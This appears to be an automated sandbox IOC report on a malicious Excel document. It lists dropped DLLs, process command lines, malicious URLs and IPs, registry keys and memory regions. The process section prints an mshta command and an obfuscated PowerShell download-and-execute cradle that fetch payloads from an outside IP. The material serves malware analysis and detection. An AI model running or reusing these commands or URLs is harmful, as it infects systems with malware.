IOC Report

loading gif

Files

File Path
Type
Category
Malicious
DETAILS-145.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
initial sample
malicious
C:\ProgramData\QWER.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\DETAILS-145.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\54C4.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DF632A2497A7AF7BEB.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF82D94E817519DDA2.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9GJ9Z9AFXFR1GJOG96FG.temp
data
dropped
C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
cmd /c mshta http://91.240.118.168/qqw/aas/se.html
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.168/qqw/aas/se.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
malicious
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://kuyporn.com/wp-content/XS
unknown
malicious
http://docs-construction.com/wp-admin/JJEf0kEA5/PE3
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlWinSta0
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlfunction
unknown
malicious
https://grupomartinsanchez.com/w
unknown
malicious
https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlv1.0
unknown
malicious
https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3
unknown
malicious
https://elroieyecentre.org/cgi-b
unknown
malicious
https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3
unknown
malicious
http://jeffreylubin.igclout.com/wp-admin/vzOG/
74.208.236.157
malicious
http://91.240.11
unknown
malicious
http://91.240.118.168/qqw/aas/se.html~(
unknown
malicious
http://kuyporn.com/wp-content/XSs5/
172.67.149.209
malicious
http://docs-construction.com/wp-admin/JJEf0kEA5/
unknown
malicious
http://flybustravel.com/cgi-bin/2TjUH/
unknown
malicious
http://wallacebradley.com/css/Yc
unknown
malicious
http://91.240.118.168/qqw/aas/se.pngPE3
unknown
malicious
http://wallacebradley.com/css/YcDc927SJR/
unknown
malicious
https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3
unknown
malicious
https://algzor.com/wp-includes/g
unknown
malicious
http://wallacebradley.com/css/YcDc927SJR/PE3
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html
unknown
malicious
https://bluwom-milano.com/wp-content/FEj3y4z/
unknown
malicious
https://esaci-egypt.com/wp-includes/W7qXVeGp/
unknown
malicious
https://thaireportchannel.com/wp-includes/KaWZp0odkEO/
unknown
malicious
http://kuyporn.com
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlNE
unknown
malicious
http://flybustravel.com/cgi-bin/2TjUH/PE3
unknown
malicious
http://kuyporn.com/wp-content/XSs5/PE3
unknown
malicious
http://91.240.118.168/qqw/aas/se.html
91.240.118.168
malicious
http://91.240.118.168/qqw/aas/se.htmlB
unknown
malicious
https://bluwom-milano.com/wp-con
unknown
malicious
https://bluwom-milano.com/wp-content/FEj3y4z/PE3
unknown
malicious
http://jeffreylubin.igclout.com
unknown
malicious
https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/
unknown
malicious
http://91.240.118.168/qqw/aas/se.html&E
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmln
unknown
malicious
http://91.240.118.168/qqw/aas/se
unknown
malicious
http://91.240.118.168/qqw/aas/se.png
91.240.118.168
malicious
https://thaireportchannel.com/wp
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmls
unknown
malicious
http://jeffreylubin.igclout.com/
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlC:
unknown
malicious
http://flybustravel.com/cgi-bin/
unknown
malicious
http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3
unknown
malicious
https://esaci-egypt.com/wp-inclu
unknown
malicious
https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/
unknown
malicious
http://91.240.118.168
unknown
malicious
https://algzor.com/wp-includes/ghFXVrGLEh/PE3
unknown
malicious
https://algzor.com/wp-includes/ghFXVrGLEh/
unknown
malicious
https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlmshta
unknown
malicious
https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3
unknown
malicious
https://pcovestudio.com/wp-admin
unknown
malicious
http://piriform.comk
unknown
https://algzor.c
unknown
http://kuyporn.c
unknown
http://www.protware.comth4cM
unknown
http://www.%s.comPA
unknown
http://docs-construction.com/wp-
unknown
https://www.cloudflare.com/5xx-error-landing
unknown
http://www.protware.com
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
unknown
There are 54 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
kuyporn.com
172.67.149.209
jeffreylubin.igclout.com
74.208.236.157

IPs

IP
Domain
Country
Malicious
207.148.81.119
unknown
United States
malicious
104.131.62.48
unknown
United States
malicious
198.199.98.78
unknown
United States
malicious
194.9.172.107
unknown
unknown
malicious
59.148.253.194
unknown
Hong Kong
malicious
74.207.230.120
unknown
United States
malicious
103.41.204.169
unknown
Indonesia
malicious
85.214.67.203
unknown
Germany
malicious
191.252.103.16
unknown
Brazil
malicious
168.197.250.14
unknown
Argentina
malicious
185.148.168.15
unknown
Germany
malicious
66.42.57.149
unknown
United States
malicious
91.240.118.168
unknown
unknown
malicious
139.196.72.155
unknown
China
malicious
217.182.143.207
unknown
France
malicious
203.153.216.46
unknown
Indonesia
malicious
159.69.237.188
unknown
Germany
malicious
116.124.128.206
unknown
Korea Republic of
malicious
37.59.209.141
unknown
France
malicious
78.46.73.125
unknown
Germany
malicious
210.57.209.142
unknown
Indonesia
malicious
185.148.168.220
unknown
Germany
malicious
54.37.228.122
unknown
France
malicious
185.168.130.138
unknown
Ukraine
malicious
190.90.233.66
unknown
Colombia
malicious
142.4.219.173
unknown
Canada
malicious
54.38.242.185
unknown
France
malicious
195.154.146.35
unknown
France
malicious
195.77.239.39
unknown
Spain
malicious
78.47.204.80
unknown
Germany
malicious
118.98.72.86
unknown
Indonesia
malicious
37.44.244.177
unknown
Germany
malicious
62.171.178.147
unknown
United Kingdom
malicious
128.199.192.135
unknown
United Kingdom
malicious
172.67.149.209
kuyporn.com
United States
74.208.236.157
jeffreylubin.igclout.com
United States
There are 26 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
dn-
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2F18F
2F18F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
7u-
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35EC3
35EC3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\366ED
366ED
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 60 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
trusted library allocation
page execute and read and write
malicious
28E0000
trusted library allocation
page execute and read and write
malicious
230000
trusted library allocation
page execute and read and write
malicious
911000
trusted library allocation
page execute read
malicious
221000
trusted library allocation
page execute read
malicious
24D1000
trusted library allocation
page execute read
malicious
231000
unkown
page execute read
malicious
2381000
trusted library allocation
page execute read
malicious
2731000
trusted library allocation
page execute read
malicious
2861000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
2A1000
trusted library allocation
page execute read
malicious
3D0000
trusted library allocation
page execute and read and write
malicious
26B0000
trusted library allocation
page execute and read and write
malicious
2E71000
trusted library allocation
page execute read
malicious
2671000
trusted library allocation
page execute read
malicious
2E21000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
27A0000
trusted library allocation
page execute and read and write
malicious
2E81000
trusted library allocation
page execute read
malicious
2281000
trusted library allocation
page execute read
malicious
23D0000
trusted library allocation
page execute and read and write
malicious
2381000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
180000
trusted library allocation
page execute and read and write
malicious
241000
trusted library allocation
page execute read
malicious
AE0000
trusted library allocation
page execute and read and write
malicious
2251000
trusted library allocation
page execute read
malicious
2E40000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
8A1000
trusted library allocation
page execute read
malicious
2E50000
trusted library allocation
page execute and read and write
malicious
2811000
trusted library allocation
page execute read
malicious
171000
trusted library allocation
page execute read
malicious
220000
trusted library allocation
page execute and read and write
malicious
2F40000
trusted library allocation
page execute and read and write
malicious
A71000
trusted library allocation
page execute read
malicious
380000
trusted library allocation
page execute and read and write
malicious
A40000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
1A0000
trusted library allocation
page execute and read and write
malicious
1A0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
3D1000
trusted library allocation
page execute read
malicious
1D0000
trusted library allocation
page execute and read and write
malicious
370000
trusted library allocation
page execute and read and write
malicious
7A0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2590000
trusted library allocation
page execute and read and write
malicious
25F0000
trusted library allocation
page execute and read and write
malicious
2960000
trusted library allocation
page execute and read and write
malicious
2321000
trusted library allocation
page execute read
malicious
2350000
trusted library allocation
page execute and read and write
malicious
1D1000
trusted library allocation
page execute read
malicious
A60000
trusted library allocation
page execute and read and write
malicious
2ED0000
trusted library allocation
page execute and read and write
malicious
2411000
trusted library allocation
page execute read
malicious
25C1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
2EB1000
trusted library allocation
page execute read
malicious
910000
trusted library allocation
page execute and read and write
malicious
140000
trusted library allocation
page execute and read and write
malicious
1B1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
8E0000
trusted library allocation
page execute and read and write
malicious
5F1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
3171000
trusted library allocation
page execute read
malicious
22B0000
trusted library allocation
page execute and read and write
malicious
180000
unkown
page execute and read and write
malicious
2F30000
trusted library allocation
page execute and read and write
malicious
821000
trusted library allocation
page execute read
malicious
2FD1000
trusted library allocation
page execute read
malicious
201000
trusted library allocation
page execute read
malicious
771000
trusted library allocation
page execute read
malicious
23E0000
trusted library allocation
page execute and read and write
malicious
1D0000
trusted library allocation
page execute and read and write
malicious
31D1000
trusted library allocation
page execute read
malicious
8E0E000
trusted library allocation
page read and write
2CEB000
trusted library allocation
page read and write
A95000
trusted library allocation
page read and write
26F2000
trusted library allocation
page read and write
2FE8000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
3B4000
heap
page read and write
2E9D000
heap
page read and write
2850000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
2709000
trusted library allocation
page read and write
24C1000
trusted library allocation
page read and write
4BA000
heap
page read and write
26F6000
trusted library allocation
page read and write
8C5000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
180000
heap
page read and write
28E2000
heap
page read and write
4433000
trusted library allocation
page read and write
342000
heap
page read and write
7FF002A0000
trusted library allocation
page execute and read and write
5D7000
heap
page read and write
89F000
stack
page read and write
10046000
unkown
page readonly
5D0000
heap
page read and write
31C0000
trusted library allocation
page read and write
3250000
trusted library allocation
page read and write
1F0000
heap
page read and write
3F5000
heap
page read and write
24BC000
trusted library allocation
page read and write
10046000
unkown
page readonly
845000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
10046000
unkown
page readonly
24A9000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
657000
heap
page read and write
1F6000
trusted library allocation
page read and write
3149000
trusted library allocation
page read and write
26F0000
trusted library allocation
page read and write
2F19000
heap
page read and write
25AF000
trusted library allocation
page read and write
2790000
trusted library allocation
page read and write
10000000
unkown
page readonly
83CE000
trusted library allocation
page read and write
34A000
heap
page read and write
302F000
trusted library allocation
page read and write
271A000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
2CF4000
trusted library allocation
page read and write
8F2000
heap
page read and write
2EF4000
heap
page read and write
8EFE000
trusted library allocation
page read and write
90CE000
trusted library allocation
page read and write
2C5000
trusted library allocation
page read and write
1E0000
heap
page read and write
2A50000
heap
page read and write
1F88000
trusted library allocation
page read and write
2FCE000
trusted library allocation
page read and write
10053000
unkown
page read and write
20000
heap
page read and write
2CF4000
trusted library allocation
page read and write
90CE000
trusted library allocation
page read and write
30CE000
stack
page read and write
2EB0000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
2E30000
heap
page read and write
2310000
trusted library allocation
page read and write
2410000
trusted library allocation
page read and write
390000
heap
page read and write
31EB000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
24F0000
trusted library allocation
page read and write
1F12000
trusted library allocation
page read and write
2695000
trusted library allocation
page read and write
420000
heap
page read and write
2C3C000
stack
page read and write
1F68000
trusted library allocation
page read and write
24BA000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
26F1000
trusted library allocation
page read and write
2A0000
trusted library allocation
page read and write
1E10000
heap
page read and write
2420000
trusted library allocation
page read and write
25C0000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
265000
trusted library allocation
page read and write
436000
heap
page read and write
2C49000
trusted library allocation
page read and write
24F5000
trusted library allocation
page read and write
442000
heap
page read and write
2F19000
heap
page read and write
43F0000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
31D0000
trusted library allocation
page read and write
2710000
trusted library allocation
page read and write
2730000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
24BB000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
2E66000
heap
page read and write
2FEC000
trusted library allocation
page read and write
2275000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
406000
heap
page read and write
29D0000
heap
page execute and read and write
4433000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
226000
trusted library allocation
page read and write
8E9E000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
240000
trusted library allocation
page read and write
3649000
trusted library allocation
page read and write
258F000
stack
page read and write
2F7000
heap
page read and write
1005A000
unkown
page readonly
3A3A000
trusted library allocation
page read and write
1EA8000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
2EEF000
heap
page read and write
2EE8000
heap
page read and write
2CEB000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
1D5000
trusted library allocation
page read and write
2FD7000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
3250000
trusted library allocation
page read and write
2E96000
trusted library allocation
page read and write
3244000
heap
page read and write
750000
trusted library allocation
page read and write
7997000
unkown
page read and write
2CF4000
trusted library allocation
page read and write
2EB0000
heap
page read and write
2C49000
trusted library allocation
page read and write
12DC1000
trusted library allocation
page read and write
24AE000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
2ECB000
heap
page read and write
2EEF000
heap
page read and write
2842000
heap
page read and write
2E95000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
2704000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
2EED000
heap
page read and write
196000
stack
page read and write
4433000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
8EFE000
trusted library allocation
page read and write
1B800000
heap
page read and write
2850000
trusted library allocation
page read and write
2D10000
trusted library allocation
page read and write
3171000
trusted library allocation
page read and write
2F1B000
heap
page read and write
2930000
remote allocation
page read and write
6D4000
heap
page read and write
1EC000
stack
page read and write
271000
stack
page read and write
4A9C000
heap
page read and write
2CF4000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
2C17000
unkown
page read and write
220000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
1F44000
trusted library allocation
page read and write
2CF4000
trusted library allocation
page read and write
24A9000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
2EF4000
heap
page read and write
2CEB000
trusted library allocation
page read and write
120000
heap
page read and write
54E000
heap
page read and write
2F7D000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page read and write
2CF4000
trusted library allocation
page read and write
2D50000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
357000
heap
page read and write
60D000
heap
page read and write
3EE000
heap
page read and write
2F48000
trusted library allocation
page read and write
24AD000
trusted library allocation
page read and write
7FF00030000
trusted library allocation
page read and write
2E9D000
heap
page read and write
2CFD000
trusted library allocation
page read and write
431000
heap
page read and write
271A000
trusted library allocation
page read and write
2FF9000
trusted library allocation
page read and write
270B000
trusted library allocation
page read and write
31F1000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
1F5000
trusted library allocation
page read and write
2F0C000
heap
page read and write
8B0000
heap
page read and write
24AD000
trusted library allocation
page read and write
2F51000
trusted library allocation
page read and write
22A5000
trusted library allocation
page read and write
24AA000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
2820000
heap
page read and write
6BA000
heap
page read and write
271C000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
434000
heap
page read and write
407000
heap
page read and write
281D000
stack
page read and write
883E000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
1F44000
trusted library allocation
page read and write
10057000
unkown
page read and write
3B0000
heap
page read and write
26F5000
trusted library allocation
page read and write
2EE8000
heap
page read and write
2C49000
trusted library allocation
page read and write
2E41000
heap
page read and write
704000
heap
page read and write
3050000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
41B000
heap
page read and write
1F68000
trusted library allocation
page read and write
2EDC000
trusted library allocation
page read and write
22F0000
heap
page read and write
10053000
unkown
page read and write
35B7000
trusted library allocation
page read and write
7EFAC000
unkown
page read and write
1F88000
trusted library allocation
page read and write
1005A000
unkown
page readonly
24D0000
trusted library allocation
page read and write
2ED6000
heap
page read and write
2707000
trusted library allocation
page read and write
2F01000
heap
page read and write
2EF4000
heap
page read and write
3A61000
trusted library allocation
page read and write
3D0000
trusted library allocation
page read and write
2CB1000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
4884000
heap
page read and write
1F44000
trusted library allocation
page read and write
35E3000
trusted library allocation
page read and write
7FF000E0000
trusted library allocation
page read and write
246000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
12F00000
trusted library allocation
page read and write
796000
trusted library allocation
page read and write
2B5E000
stack
page read and write
1F76000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
24B0000
heap
page read and write
2CFA000
trusted library allocation
page read and write
AF0000
